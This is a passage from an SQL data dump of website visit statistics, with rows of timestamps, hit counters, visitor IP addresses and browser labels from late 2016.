1477941936,1,1,0,0,'66.102.9.59','other'),(72045,1477942229,1,1,0,0,'178.92.8.154','chrome'),(72046,1477942252,1,1,0,0,'94.179.209.79','firefox'),(72047,1477942797,1,1,0,0,'163.172.66.2','other'),(72048,1477942832,1,1,0,0,'163.172.66.27','other'),(72049,1477943303,1,0,1,0,'68.180.230.220',''),(72050,1477943614,1,1,0,0,'163.172.66.93','other'),(72051,1477944639,1,1,0,0,'178.255.215.94','other'),(72052,1477944913,1,1,0,0,'163.172.65.107','other'),(72053,1477945122,1,1,0,0,'163.172.65.234','other'),(72054,1477945590,1,1,0,0,'66.249.64.79','chrome'),(72055,1477945854,1,1,0,0,'163.172.66.74','other'),(72056,1477945894,1,0,1,0,'66.249.64.24',''),(72057,1477946014,1,0,1,0,'66.249.64.27',''),(72058,1477946079,1,1,0,0,'163.172.65.111','other'),(72059,1477946081,2,0,2,0,'66.249.64.21',''),(72060,1477946795,1,1,0,0,'94.178.93.70','chrome'),(72061,1477946864,1,1,0,0,'141.8.142.58','other'),(72062,1477946888,1,1,0,0,'91.196.178.99','firefox'),(72063,1477947053,1,1,0,0,'163.172.64.217','other'),(72064,1477947060,1,0,1,0,'66.249.64.74',''),(72065,1477947192,1,1,0,0,'163.172.65.241','other'),(72066,1477947429,1,1,0,0,'163.172.66.122','other'),(72067,1477947889,1,1,0,0,'130.193.50.34','other'),(72068,1477947890,1,0,1,0,'66.249.64.24',''),(72069,1477948280,1,0,1,0,'66.249.64.27',''),(72070,1477948732,1,1,0,0,'207.46.13.85','other'),(72071,1477948867,1,1,0,0,'163.172.66.60','other'),(72072,1477949087,1,1,0,0,'163.172.64.193','other'),(72073,1477949485,1,1,0,0,'37.204.201.193','other'),(72074,1477950151,1,1,0,0,'163.172.65.221','other'),(72075,1477950286,1,1,0,0,'141.8.142.61','other'),(72076,1477950330,1,1,0,0,'141.8.183.25','other'),(72077,1477950789,1,0,1,0,'66.249.64.24',''),(72078,1477951169,1,1,0,0,'163.172.66.119','other'),(72079,1477952990,3,0,3,0,'66.249.64.21',''),(72080,1477953302,1,1,0,0,'91.196.178.103','chrome'),(72081,1477953687,1,1,0,0,'40.77.167.77','other'),(72082,1477953983,2,0,2,0,'66.249.64.27',''),(72083,1477954227,1,1,0,0,'163.172.66.36','other'),(72084,1477954338,1,1,0,0,'163.172.66.72','other'),(72085,1477954436,1,1,0,0,'163.172.65.204','other'),(72086,1477954539,1,1,0,0,'163.172.65.198','other'),(72087,1477954745,1,1,0,0,'104.183.171.105','firefox'),(72088,1477954912,1,0,1,0,'66.249.64.24',''),(72089,1477954921,1,0,1,0,'66.249.64.21',''),(72090,1477955123,1,1,0,0,'66.102.9.61','other'),(72091,1477955200,2,0,2,0,'66.249.64.27',''),(72092,1477955512,1,0,1,0,'66.249.64.74',''),(72093,1477956113,1,1,0,0,'163.172.65.4','other'),(72094,1477957041,4,0,4,0,'66.249.64.27',''),(72095,1477957782,1,1,0,0,'163.172.64.184','other'),(72096,1477957884,1,0,1,0,'66.249.64.21',''),(72098,1477958124,2,0,2,0,'66.249.64.27',''),(72099,1477958597,1,1,0,0,'163.172.66.75','other'),(72100,1477958744,1,0,1,0,'66.249.64.24',''),(72101,1477959383,1,1,0,0,'163.172.65.4','other'),(72102,1477959677,1,1,0,0,'163.172.65.205','other'),(72103,1477959963,2,0,2,0,'66.249.64.24',''),(72104,1477960409,3,1,2,0,'66.249.64.24',''),(72105,1477960503,1,1,0,0,'163.172.66.177','other'),(72106,1477960844,1,1,0,0,'163.172.64.216','other'),(72107,1477961077,1,1,0,0,'163.172.64.217','other'),(72108,1477961348,2,0,2,0,'66.249.64.27',''),(72109,1477961381,2,2,0,0,'130.193.50.34','other'),(72110,1477961637,1,1,0,0,'40.77.167.77','other'),(72111,1477961762,1,1,0,0,'180.76.15.162','other'),(72112,1477962244,1,1,0,0,'163.172.66.178','other'),(72113,1477964060,1,1,0,0,'163.172.64.177','other'),(72114,1477964470,1,0,1,0,'66.249.64.24',''),(72115,1477964702,1,1,0,0,'163.172.65.209','other'),(72116,1477965519,1,0,1,0,'66.249.64.21',''),(72117,1477966760,1,1,0,0,'163.172.66.49','other'),(72118,1477966921,1,1,0,0,'163.172.66.7','other'),(72119,1477969397,1,1,0,0,'163.172.65.23','other'),(72120,1477969553,1,0,1,0,'66.249.64.74',''),(72121,1477969730,1,0,1,0,'66.249.64.24',''),(72122,1477969956,1,0,1,0,'66.249.64.21',''),(72123,1477970963,1,1,0,0,'163.172.66.120','other'),(72124,1477971209,1,1,0,0,'163.172.66.18','other'),(72125,1477971785,1,1,0,0,'40.77.167.51','other'),(72126,1477972186,1,1,0,0,'163.172.66.7','other'),(72127,1477972372,1,0,1,0,'66.249.64.27',''),(72128,1477972498,1,1,0,0,'163.172.66.146','other'),(72129,1477972756,1,1,0,0,'163.172.66.71','other'),(72130,1477973396,4,4,0,0,'62.221.75.114','chrome'),(72131,1477973522,1,1,0,0,'163.172.66.175','other'),(72132,1477973754,1,1,0,0,'66.102.9.57','other'),(72133,1477973868,1,1,0,0,'163.172.65.110','other'),(72134,1477974965,3,3,0,0,'130.193.50.34','other'),(72135,1477975018,1,0,1,0,'66.249.64.21',''),(72136,1477975063,2,2,0,0,'141.8.183.25','other'),(72137,1477975118,1,0,1,0,'66.249.64.27',''),(72138,1477975376,1,1,0,0,'163.172.66.95','other'),(72139,1477975402,1,0,1,0,'66.249.64.24',''),(72140,1477977416,1,1,0,0,'188.163.75.21','firefox'),(72141,1477977425,1,0,1,0,'66.249.64.21',''),(72142,1477977497,1,0,1,0,'66.249.64.24',''),(72143,1477977579,1,1,0,0,'163.172.66.129','other'),(72144,1477977817,1,1,0,0,'66.102.9.59','other'),(72145,1477979044,1,1,0,0,'180.76.15.160','other'),(72146,1477979055,1,1,0,0,'163.172.65.239','other'),(72147,1477979167,1,0,1,0,'66.249.64.27',''),(72148,1477979360,1,0,1,0,'66.249.64.21',''),(72149,1477979440,1,1,0,0,'66.249.64.27','chrome'),(72150,1477979456,1,1,0,0,'141.8.142.85','other'),(72151,1477979581,1,1,0,0,'5.255.253.47','other'),(72152,1477979684,1,1,0,0,'163.172.66.182','other'),(72153,1477979714,1,1,0,0,'141.8.142.25','other'),(72154,1477980515,3,0,3,0,'66.249.64.24',''),(72155,1477980538,3,0,3,0,'66.249.64.21',''),(72156,1477980570,1,1,0,0,'91.196.178.68','firefox'),(72157,1477981199,1,1,0,0,'66.102.9.59','other'),(72158,1477981837,1,1,0,0,'195.62.14.156','chrome'),(72159,1477981888,1,1,0,0,'163.172.66.23','other'),(72160,1477982960,1,1,0,0,'207.46.13.22','other'),(72161,1477983073,1,1,0,0,'195.62.14.156','chrome'),(72162,1477983144,1,1,0,0,'91.196.178.67','chrome'),(72163,1477983224,1,1,0,0,'91.196.178.68','firefox'),(72164,1477983230,1,1,0,0,'207.46.13.169','other'),(72165,1477983251,1,1,0,0,'180.76.15.26','other'),(72166,1477983719,1,0,1,0,'66.249.64.21',''),(72167,1477984455,1,1,0,0,'163.172.65.189','other'),(72168,1477984534,1,1,0,0,'163.172.66.130','other'),(72169,1477984562,1,1,0,0,'176.117.172.65','chrome'),(72170,1477984667,1,1,0,0,'66.102.9.57','other'),(72171,1477984705,1,1,0,0,'163.172.66.39','other'),(72172,1477984773,1,1,0,0,'163.172.65.18','other'),(72173,1477984864,1,0,1,0,'66.249.64.21',''),(72174,1477985577,1,1,0,0,'130.193.50.34','other'),(72175,1477985668,1,1,0,0,'31.43.29.64','other'),(72176,1477985669,1,1,0,0,'31.43.29.64','msie'),(72178,1477985783,1,0,1,0,'66.249.64.21',''),(72179,1477986221,1,1,0,0,'163.172.65.36','other'),(72180,1477986350,1,1,0,0,'163.172.66.163','other'),(72181,1477986351,1,1,0,0,'40.77.167.76','other'),(72182,1477986360,1,0,1,0,'66.249.64.24',''),(72183,1477986597,2,2,0,0,'91.196.177.46','firefox'),(72184,1477988225,1,1,0,0,'130.180.218.52','firefox'),(72185,1477988259,1,1,0,0,'66.102.9.57','other'),(72186,1477988338,1,1,0,0,'163.172.65.181','other'),(72187,1477988673,1,1,0,0,'163.172.64.251','other'),(72188,1477988896,2,0,2,0,'66.249.64.27',''),(72189,1477988941,1,1,0,0,'91.196.178.165','chrome'),(72190,1477990110,1,1,0,0,'207.46.13.22','other'),(72191,1477990189,1,1,0,0,'37.52.127.157','firefox'),(72192,1477990323,1,1,0,0,'163.172.66.127','other'),(72193,1477990555,1,0,1,0,'66.249.64.21',''),(72194,1477990556,2,0,2,0,'66.249.64.27',''),(72195,1477990767,1,0,1,0,'66.249.64.24',''),(72196,1477991003,1,1,0,0,'163.172.65.40','other'),(72197,1477991119,1,1,0,0,'163.172.66.4','other'),(72198,1477991396,1,1,0,0,'66.249.64.69','chrome'),(72199,1477991615,1,1,0,0,'163.172.66.84','other'),(72200,1477992058,1,1,0,0,'91.196.178.165','chrome'),(72201,1477992212,1,1,0,0,'66.102.9.61','other'),(72202,1477992784,2,0,2,0,'66.249.64.24',''),(72203,1477993138,1,1,0,0,'163.172.65.39','other'),(72204,1477993411,1,1,0,0,'207.46.13.22','other'),(72205,1477993420,1,1,0,0,'163.172.64.189','other'),(72206,1477993828,1,1,0,0,'163.172.66.157','other'),(72207,1477993954,1,1,0,0,'95.135.36.200','chrome'),(72208,1477994823,1,1,0,0,'31.43.29.64','other'),(72209,1477994824,1,1,0,0,'31.43.29.64','msie'),(72210,1477994830,1,1,0,0,'31.43.29.64','firefox'),(72211,1477995095,1,0,1,0,'66.249.64.24',''),(72212,1477995503,1,1,0,0,'66.102.9.61','other'),(72213,1477995514,1,1,0,0,'163.172.66.57','other'),(72214,1477995887,1,1,0,0,'31.43.29.64','other'),(72216,1477996006,1,1,0,0,'180.76.15.135','other'),(72217,1477996491,1,0,1,0,'66.249.64.24',''),(72218,1477996540,1,0,1,0,'66.249.64.21',''),(72219,1477997193,1,1,0,0,'163.172.65.201','other'),(72220,1477997469,1,1,0,0,'5.1.30.149','chrome'),(72221,1477997826,1,1,0,0,'94.179.23.144','chrome'),(72222,1477998690,1,1,0,0,'163.172.64.226','other'),(72223,1477998761,1,1,0,0,'163.172.65.8','other'),(72224,1477998989,1,0,1,0,'66.249.64.24',''),(72225,1477999126,1,1,0,0,'163.172.66.143','other'),(72226,1477999184,1,1,0,0,'91.210.146.187','chrome'),(72227,1477999257,1,1,0,0,'66.102.9.59','other'),(72228,1477999621,1,1,0,0,'163.172.66.39','other'),(72229,1478000046,1,1,0,0,'163.172.66.128','other'),(72230,1478000216,1,1,0,0,'91.196.178.68','firefox'),(72231,1478000270,1,1,0,0,'163.172.65.205','other'),(72232,1478000297,1,1,0,0,'91.196.178.165','chrome'),(72233,1478001069,1,1,0,0,'163.172.66.111','other'),(72234,1478001167,1,1,0,0,'163.172.66.29','other'),(72235,1478001566,1,0,1,0,'66.249.64.24',''),(72236,1478001656,1,0,1,0,'66.249.64.27',''),(72237,1478001679,1,1,0,0,'93.73.234.193','firefox'),(72238,1478002071,3,0,3,0,'66.249.64.21',''),(72239,1478002477,1,0,1,0,'66.249.64.69',''),(72240,1478002706,1,1,0,0,'66.102.9.57','other'),(72241,1478002719,1,1,0,0,'130.193.50.34','other'),(72242,1478004577,1,0,1,0,'66.249.64.27',''),(72243,1478004645,1,0,1,0,'66.249.64.24',''),(72244,1478004712,1,0,1,0,'66.249.64.21',''),(72245,1478004772,1,0,1,0,'66.249.64.79',''),(72246,1478004926,1,1,0,0,'46.211.114.163','other'),(72247,1478005541,1,1,0,0,'94.179.49.226','firefox'),(72248,1478006172,1,0,1,0,'66.249.64.27',''),(72249,1478006361,1,1,0,0,'163.172.66.154','other'),(72250,1478006543,1,1,0,0,'66.102.9.57','other'),(72251,1478006970,1,1,0,0,'91.196.178.70','firefox'),(72252,1478007137,1,0,1,0,'66.249.64.24',''),(72253,1478007174,1,1,0,0,'91.196.178.65','chrome'),(72254,1478007430,1,1,0,0,'163.172.66.37','other'),(72255,1478007742,1,0,1,0,'66.249.64.27',''),(72256,1478008693,1,1,0,0,'91.196.178.169','chrome'),(72257,1478009296,1,0,1,0,'66.249.64.21',''),(72258,1478009347,1,1,0,0,'91.196.177.46','chrome'),(72259,1478009471,1,1,0,0,'207.46.13.22','other'),(72260,1478009899,1,1,0,0,'91.196.178.70','firefox'),(72261,1478010216,1,1,0,0,'207.46.13.85','other'),(72262,1478010294,1,1,0,0,'66.102.9.25','other'),(72263,1478010492,1,0,1,0,'66.249.64.27',''),(72264,1478010567,1,0,1,0,'66.249.64.21',''),(72265,1478010572,1,1,0,0,'188.163.74.24','chrome'),(72266,1478010956,1,1,0,0,'91.196.178.68','firefox'),(72267,1478012005,1,1,0,0,'94.179.51.14','firefox'),(72268,1478012150,1,0,1,0,'66.249.64.27',''),(72269,1478014145,1,1,0,0,'207.46.13.169','other'),(72270,1478014295,1,1,0,0,'66.102.9.25','other'),(72271,1478014777,1,1,0,0,'78.111.190.224','chrome'),(72272,1478015906,1,0,1,0,'66.249.64.24',''),(72273,1478015958,1,1,0,0,'91.196.178.166','chrome'),(72274,1478016073,1,1,0,0,'46.201.175.146','chrome'),(72275,1478016099,1,1,0,0,'163.172.66.153','other'),(72276,1478016344,1,0,1,0,'66.249.64.21',''),(72277,1478016987,1,1,0,0,'163.172.66.139','other'),(72278,1478017228,1,1,0,0,'66.102.9.25','other'),(72279,1478017792,1,1,0,0,'180.76.15.20','other'),(72280,1478019318,1,1,0,0,'163.172.65.203','other'),(72281,1478019637,1,1,0,0,'163.172.66.51','other'),(72282,1478020378,1,0,1,0,'66.249.64.24',''),(72283,1478020595,1,0,1,0,'66.249.64.27',''),(72284,1478021191,1,1,0,0,'66.102.9.29','other'),(72285,1478021559,1,1,0,0,'91.196.178.36','chrome'),(72286,1478021895,1,1,0,0,'180.76.15.144','other'),(72287,1478021991,1,1,0,0,'91.196.178.67','chrome'),(72288,1478022670,1,1,0,0,'66.249.64.24','chrome'),(72289,1478022770,1,1,0,0,'163.172.65.32','other'),(72290,1478023181,1,1,0,0,'163.172.66.102','other'),(72291,1478023730,1,0,1,0,'66.249.64.24',''),(72292,1478024217,1,0,1,0,'66.249.64.74',''),(72293,1478024257,1,1,0,0,'163.172.66.74','other'),(72294,1478024899,1,1,0,0,'66.102.9.27','other'),(72295,1478025886,1,1,0,0,'163.172.64.225','other'),(72296,1478026136,1,1,0,0,'163.172.66.64','other'),(72297,1478026233,1,0,1,0,'66.249.64.27',''),(72298,1478027402,1,1,0,0,'163.172.64.250','other'),(72299,1478029414,1,1,0,0,'163.172.65.38','other'),(72300,1478029544,1,1,0,0,'66.102.9.27','other'),(72301,1478030750,1,1,0,0,'163.172.65.112','other'),(72302,1478030956,1,0,1,0,'66.249.64.24',''),(72303,1478030961,1,1,0,0,'157.55.39.78','other'),(72304,1478031016,1,1,0,0,'141.8.183.25','other'),(72305,1478031151,1,1,0,0,'66.249.64.24','chrome'),(72306,1478032303,1,0,1,0,'66.249.64.27',''),(72307,1478032663,1,1,0,0,'66.249.64.79','chrome'),(72308,1478033778,1,0,1,0,'66.249.64.74',''),(72309,1478033886,1,0,1,0,'66.249.64.21',''),(72310,1478035391,1,1,0,0,'37.73.112.74','other'),(72311,1478035951,1,0,1,0,'66.249.64.21',''),(72312,1478036143,1,0,1,0,'66.249.64.69',''),(72313,1478036404,1,0,1,0,'66.249.64.27',''),(72314,1478036530,2,0,2,0,'66.249.64.24',''),(72315,1478036850,1,1,0,0,'207.46.13.85','other'),(72316,1478038740,2,0,2,0,'66.249.64.24',''),(72317,1478038838,1,0,1,0,'66.249.64.27',''),(72318,1478038887,1,1,0,0,'207.46.13.22','other'),(72319,1478039616,2,0,2,0,'66.249.66.84',''),(72320,1478039982,3,0,3,0,'66.249.66.81',''),(72321,1478040074,1,1,0,0,'66.102.9.27','other'),(72322,1478040882,1,1,0,0,'180.76.15.161','other'),(72323,1478040883,1,1,0,0,'180.76.15.31','other'),(72324,1478041959,1,0,1,0,'66.249.66.81',''),(72325,1478041970,1,0,1,0,'66.249.66.84',''),(72326,1478042294,1,1,0,0,'66.102.9.27','other'),(72327,1478043351,1,0,1,0,'66.249.66.177',''),(72328,1478044853,1,0,1,0,'66.249.66.84',''),(72329,1478045633,1,0,1,0,'66.249.66.177',''),(72330,1478046003,1,1,0,0,'66.102.9.27','other'),(72331,1478047434,2,2,0,0,'195.154.243.59','chrome'),(72332,1478047892,2,0,2,0,'66.249.66.84',''),(72333,1478048010,1,0,1,0,'66.249.66.81',''),(72334,1478048327,1,1,0,0,'163.172.64.226','other'),(72335,1478049604,1,1,0,0,'66.102.9.25','other'),(72336,1478050123,1,0,1,0,'66.249.66.87',''),(72337,1478050582,1,1,0,0,'163.172.64.235','other'),(72338,1478051253,1,1,0,0,'163.172.64.220','other'),(72339,1478051385,1,1,0,0,'163.172.65.56','other'),(72340,1478051936,1,1,0,0,'66.249.66.84','chrome'),(72341,1478052535,1,0,1,0,'66.249.66.81',''),(72342,1478052604,1,1,0,0,'163.172.65.131','other'),(72343,1478052756,1,0,1,0,'66.249.66.177',''),(72344,1478053169,1,1,0,0,'66.249.66.81','chrome'),(72345,1478053203,1,1,0,0,'66.102.9.29','other'),(72346,1478053298,1,1,0,0,'180.76.15.27','other'),(72347,1478053639,1,1,0,0,'163.172.65.182','other'),(72348,1478054078,1,0,1,0,'66.249.66.87',''),(72349,1478055220,1,0,1,0,'66.249.66.84',''),(72350,1478055891,1,1,0,0,'163.172.65.184','other'),(72351,1478056007,1,1,0,0,'163.172.65.39','other'),(72352,1478056043,1,1,0,0,'163.172.66.34','other'),(72353,1478056803,1,1,0,0,'66.102.9.25','other'),(72354,1478058770,1,1,0,0,'163.172.65.221','other'),(72355,1478059342,1,0,1,0,'66.249.66.81',''),(72356,1478059671,1,1,0,0,'163.172.65.189','other'),(72357,1478059786,1,0,1,0,'66.249.66.84',''),(72358,1478060212,1,0,1,0,'66.249.66.87',''),(72359,1478060631,1,1,0,0,'163.172.64.180','other'),(72360,1478060792,1,1,0,0,'163.172.65.61','other'),(72361,1478060897,1,1,0,0,'163.172.65.222','other'),(72362,1478061117,1,1,0,0,'66.102.9.27','other'),(72363,1478061489,2,1,1,0,'66.249.66.84',''),(72364,1478062081,1,1,0,0,'163.172.65.4','other'),(72365,1478062194,1,1,0,0,'163.172.65.252','other'),(72366,1478062484,1,1,0,0,'163.172.64.193','other'),(72367,1478062489,2,2,0,0,'130.180.219.9','firefox'),(72368,1478062651,1,1,0,0,'207.46.13.22','other'),(72369,1478063033,2,0,2,0,'66.249.66.84',''),(72370,1478063506,1,1,0,0,'130.180.219.9','firefox'),(72371,1478064033,2,0,2,0,'66.249.66.81',''),(72372,1478064426,1,1,0,0,'66.102.9.29','other'),(72373,1478065845,1,0,1,0,'66.249.66.84',''),(72374,1478067721,1,1,0,0,'66.102.9.25','other'),(72375,1478068095,1,1,0,0,'217.69.133.224','other'),(72376,1478068788,1,0,1,0,'66.249.66.81',''),(72377,1478069320,2,0,2,0,'66.249.66.84',''),(72378,1478069912,1,1,0,0,'66.249.93.13','chrome'),(72379,1478070083,1,1,0,0,'91.196.178.136','chrome'),(72380,1478070894,1,1,0,0,'66.249.66.84','chrome'),(72381,1478071322,1,1,0,0,'174.129.237.157','other'),(72382,1478071545,1,1,0,0,'66.102.9.25','other'),(72383,1478072065,1,1,0,0,'163.172.65.59','other'),(72384,1478072948,1,1,0,0,'207.46.13.85','other'),(72385,1478072999,2,1,1,0,'62.210.83.88',''),(72386,1478074043,1,1,0,0,'163.172.65.25','other'),(72387,1478074149,1,1,0,0,'163.172.66.184','other'),(72388,1478074671,1,0,1,0,'66.249.66.81',''),(72389,1478074788,1,1,0,0,'94.178.118.222','chrome'),(72390,1478074831,1,1,0,0,'141.8.183.25','other'),(72391,1478075014,1,0,1,0,'66.249.66.177',''),(72392,1478075235,1,1,0,0,'174.129.237.157','other'),(72393,1478075303,3,0,3,0,'66.249.66.87',''),(72394,1478075454,1,1,0,0,'130.193.50.34','other'),(72395,1478075527,1,1,0,0,'66.102.9.27','other'),(72396,1478076172,1,1,0,0,'163.172.66.36','other'),(72397,1478076281,1,1,0,0,'130.180.212.102','chrome'),(72398,1478076938,1,1,0,0,'163.172.66.68','other'),(72399,1478077407,3,0,3,0,'66.249.66.81',''),(72400,1478077455,1,1,0,0,'91.196.178.67','chrome'),(72401,1478077731,1,0,1,0,'66.249.66.84',''),(72402,1478077903,1,1,0,0,'163.172.64.242','other'),(72403,1478078100,1,1,0,0,'130.180.212.102','chrome'),(72404,1478078682,2,2,0,0,'174.129.237.157','other'),(72405,1478078785,1,1,0,0,'194.187.216.115','chrome'),(72406,1478079255,1,1,0,0,'66.102.9.61','other'),(72407,1478079885,1,1,0,0,'91.196.178.70','firefox'),(72408,1478080205,1,1,0,0,'91.196.178.104','chrome'),(72409,1478080720,1,1,0,0,'163.172.66.5','other'),(72410,1478080805,1,1,0,0,'91.196.178.70','firefox'),(72411,1478080859,1,1,0,0,'163.172.65.207','other'),(72412,1478080931,1,1,0,0,'141.8.183.25','other'),(72413,1478081466,1,1,0,0,'195.248.184.80','chrome'),(72414,1478081645,1,0,1,0,'66.249.66.177',''),(72415,1478081935,1,1,0,0,'91.196.178.71','chrome'),(72416,1478082170,1,1,0,0,'141.8.183.25','other'),(72417,1478082218,1,1,0,0,'66.102.9.59','other'),(72418,1478082321,1,1,0,0,'94.179.122.208','firefox'),(72419,1478082425,1,1,0,0,'193.164.95.195','chrome'),(72420,1478083116,1,1,0,0,'91.196.177.15','chrome'),(72421,1478083172,1,1,0,0,'104.45.18.178','other'),(72422,1478083344,1,1,0,0,'163.172.65.228','other'),(72423,1478083368,1,1,0,0,'163.172.66.17','other'),(72424,1478083409,1,1,0,0,'163.172.65.13','other'),(72425,1478083447,1,1,0,0,'163.172.66.61','other'),(72426,1478083747,1,1,0,0,'178.212.241.194','chrome'),(72427,1478084387,1,1,0,0,'130.193.51.19','other'),(72428,1478084513,2,2,0,0,'141.8.142.58','other'),(72429,1478084642,1,1,0,0,'141.8.183.25','other'),(72430,1478084699,1,1,0,0,'163.172.65.198','other'),(72431,1478084892,3,3,0,0,'130.193.50.34','other'),(72432,1478085054,1,1,0,0,'163.172.64.241','other'),(72433,1478085516,1,1,0,0,'91.196.178.168','chrome'),(72434,1478085640,1,1,0,0,'66.102.9.57','other'),(72435,1478086080,1,1,0,0,'78.111.189.139','chrome'),(72436,1478087163,1,0,1,0,'66.249.66.87',''),(72437,1478087706,1,0,1,0,'66.249.66.84',''),(72438,1478087783,1,1,0,0,'141.8.142.61','other'),(72439,1478087784,1,1,0,0,'130.193.50.34','other'),(72440,1478087814,1,1,0,0,'163.172.66.57','other'),(72441,1478088040,1,1,0,0,'163.172.65.209','other'),(72442,1478088152,1,1,0,0,'91.196.178.71','firefox'),(72443,1478088687,1,1,0,0,'37.53.224.244','chrome'),(72444,1478089253,1,1,0,0,'66.102.9.57','other'),(72445,1478089844,1,1,0,0,'163.172.65.106','other'),(72446,1478090253,1,1,0,0,'157.55.39.78','other'),(72447,1478090532,1,0,1,0,'66.249.66.84',''),(72448,1478090782,1,1,0,0,'91.196.177.94','chrome'),(72449,1478091036,1,1,0,0,'163.172.64.254','other'),(72450,1478091526,3,0,3,0,'66.249.66.87',''),(72451,1478091657,1,1,0,0,'163.172.66.68','other'),(72452,1478091712,1,0,1,0,'66.249.66.84',''),(72453,1478092236,1,1,0,0,'163.172.66.170','other'),(72454,1478092583,2,2,0,0,'91.196.178.71','chrome'),(72455,1478093238,1,1,0,0,'66.102.9.59','other'),(72456,1478094357,1,1,0,0,'130.193.50.34','other'),(72457,1478095059,1,0,1,0,'66.249.66.177',''),(72458,1478095732,1,1,0,0,'37.55.240.123','opera'),(72459,1478095885,1,0,1,0,'66.249.66.84',''),(72460,1478095891,1,1,0,0,'91.196.178.168','chrome'),(72461,1478096484,1,1,0,0,'91.196.177.94','chrome'),(72462,1478097023,1,0,1,0,'66.249.66.87',''),(72463,1478097163,1,1,0,0,'66.102.9.59','other'),(72464,1478098072,1,1,0,0,'163.172.65.181','other'),(72465,1478098369,1,1,0,0,'163.172.66.23','other'),(72466,1478098378,1,1,0,0,'130.193.50.34','other'),(72467,1478098689,1,1,0,0,'91.196.178.72','firefox'),(72468,1478098869,1,1,0,0,'195.49.151.89','chrome'),(72469,1478098986,1,1,0,0,'37.53.123.16','chrome'),(72470,1478099504,1,1,0,0,'207.46.13.169','other'),(72471,1478099571,1,1,0,0,'163.172.66.92','other'),(72472,1478099862,1,1,0,0,'163.172.65.187','other'),(72473,1478099874,1,1,0,0,'163.172.66.84','other'),(72474,1478099967,1,1,0,0,'141.8.142.67','other'),(72475,1478100443,1,1,0,0,'94.179.59.86','chrome'),(72476,1478100781,2,1,1,0,'66.249.66.84',''),(72477,1478100807,1,1,0,0,'66.102.9.57','chrome'),(72478,1478101182,2,0,2,0,'66.249.66.87',''),(72479,1478101578,1,1,0,0,'91.196.178.168','chrome'),(72480,1478101705,2,2,0,0,'207.46.13.169','other'),(72481,1478103035,1,1,0,0,'91.196.177.15','chrome'),(72482,1478103423,1,1,0,0,'92.113.139.82','chrome'),(72483,1478103724,2,0,2,0,'66.249.66.87',''),(72484,1478103941,1,0,1,0,'66.249.66.81',''),(72485,1478104024,1,1,0,0,'178.255.215.94','other'),(72486,1478104429,1,1,0,0,'94.179.209.79','firefox'),(72487,1478104702,2,0,2,0,'68.180.230.220',''),(72488,1478104824,1,1,0,0,'91.196.178.65','chrome'),(72489,1478105221,1,0,1,0,'66.249.66.81',''),(72490,1478105368,1,0,1,0,'66.249.66.84',''),(72491,1478105612,1,1,0,0,'207.46.13.169','other'),(72492,1478105670,1,1,0,0,'163.172.65.112','other'),(72493,1478105940,1,0,1,0,'66.249.66.87',''),(72494,1478106691,1,1,0,0,'163.172.66.81','other'),(72495,1478107751,1,1,0,0,'157.55.39.78','other'),(72496,1478107754,1,1,0,0,'163.172.65.185','other'),(72497,1478107952,1,1,0,0,'163.172.65.203','other'),(72498,1478107964,1,1,0,0,'130.180.219.102','chrome'),(72499,1478108062,1,1,0,0,'66.102.9.57','other'),(72500,1478108167,1,0,1,0,'66.249.66.84',''),(72501,1478108388,1,1,0,0,'163.172.66.19','other'),(72502,1478108900,1,0,1,0,'66.249.66.81',''),(72503,1478108957,1,0,1,0,'68.180.230.220',''),(72504,1478110636,1,0,1,0,'66.249.66.81',''),(72505,1478111087,1,1,0,0,'66.102.9.59','other'),(72506,1478112145,1,1,0,0,'163.172.65.16','other'),(72507,1478112224,1,1,0,0,'163.172.65.186','other'),(72508,1478112665,1,0,1,0,'66.249.66.84',''),(72509,1478112847,1,1,0,0,'163.172.65.19','other'),(72510,1478113205,1,1,0,0,'130.180.220.101','firefox'),(72511,1478113409,1,1,0,0,'163.172.65.10','other'),(72512,1478113860,1,1,0,0,'163.172.66.127','other'),(72513,1478113910,1,0,1,0,'66.249.66.183',''),(72514,1478114576,1,0,1,0,'66.249.66.87',''),(72515,1478114714,1,1,0,0,'163.172.64.185','other'),(72516,1478114725,1,1,0,0,'163.172.66.119','other'),(72517,1478115117,1,0,1,0,'66.249.66.81',''),(72518,1478115582,1,0,1,0,'66.249.66.84',''),(72519,1478117593,1,0,1,0,'66.249.66.87',''),(72520,1478118204,1,1,0,0,'66.102.9.59','other'),(72521,1478118618,1,1,0,0,'92.113.79.24','chrome'),(72522,1478119249,2,0,2,0,'66.249.66.87',''),(72523,1478120031,1,0,1,0,'66.249.66.81',''),(72524,1478120423,1,1,0,0,'91.196.178.104','chrome'),(72525,1478120518,1,1,0,0,'163.172.64.235','other'),(72526,1478121857,1,1,0,0,'66.102.9.57','other'),(72527,1478122556,1,1,0,0,'163.172.66.23','other'),(72528,1478122721,1,0,1,0,'66.249.66.87',''),(72529,1478122929,1,1,0,0,'163.172.66.159','other'),(72530,1478123309,1,0,1,0,'66.249.66.84',''),(72531,1478123519,1,1,0,0,'163.172.65.208','other'),(72532,1478123638,1,0,1,0,'66.249.66.87',''),(72533,1478123849,1,1,0,0,'163.172.66.162','other'),(72534,1478124245,1,1,0,0,'163.172.65.234','other'),(72535,1478124768,1,0,1,0,'66.249.66.177',''),(72536,1478124780,1,0,1,0,'66.249.66.81',''),(72537,1478124854,1,1,0,0,'163.172.66.97','other'),(72538,1478124920,1,0,1,0,'66.249.66.84',''),(72539,1478125078,1,1,0,0,'130.193.51.19','other'),(72540,1478125548,2,2,0,0,'141.8.183.25','other'),(72541,1478125574,1,0,1,0,'66.249.66.183',''),(72542,1478125617,1,1,0,0,'66.102.9.57','other'),(72543,1478126221,1,0,1,0,'66.249.66.84',''),(72544,1478127381,1,1,0,0,'163.172.65.48','other'),(72545,1478127542,2,2,0,0,'130.193.50.34','other'),(72546,1478128959,1,1,0,0,'66.102.9.59','other'),(72547,1478129022,1,1,0,0,'95.27.245.109','firefox'),(72548,1478129125,2,2,0,0,'130.193.50.34','other'),(72549,1478129229,1,1,0,0,'180.76.15.10','other'),(72550,1478129305,1,0,1,0,'66.249.66.81',''),(72551,1478129409,1,1,0,0,'141.8.183.25','other'),(72552,1478129792,1,0,1,0,'66.249.66.84',''),(72553,1478130251,2,2,0,0,'130.193.50.34','other'),(72554,1478130305,1,0,1,0,'66.249.66.183',''),(72555,1478130722,1,1,0,0,'163.172.65.38','other'),(72556,1478131091,1,1,0,0,'163.172.65.218','other'),(72557,1478131175,1,1,0,0,'130.193.50.34','other'),(72558,1478131333,1,1,0,0,'163.172.66.58','other'),(72559,1478131672,1,0,1,0,'66.249.66.180',''),(72560,1478131712,1,0,1,0,'66.249.66.81',''),(72561,1478133372,1,1,0,0,'163.172.64.254','other'),(72562,1478133373,1,1,0,0,'163.172.65.109','other'),(72563,14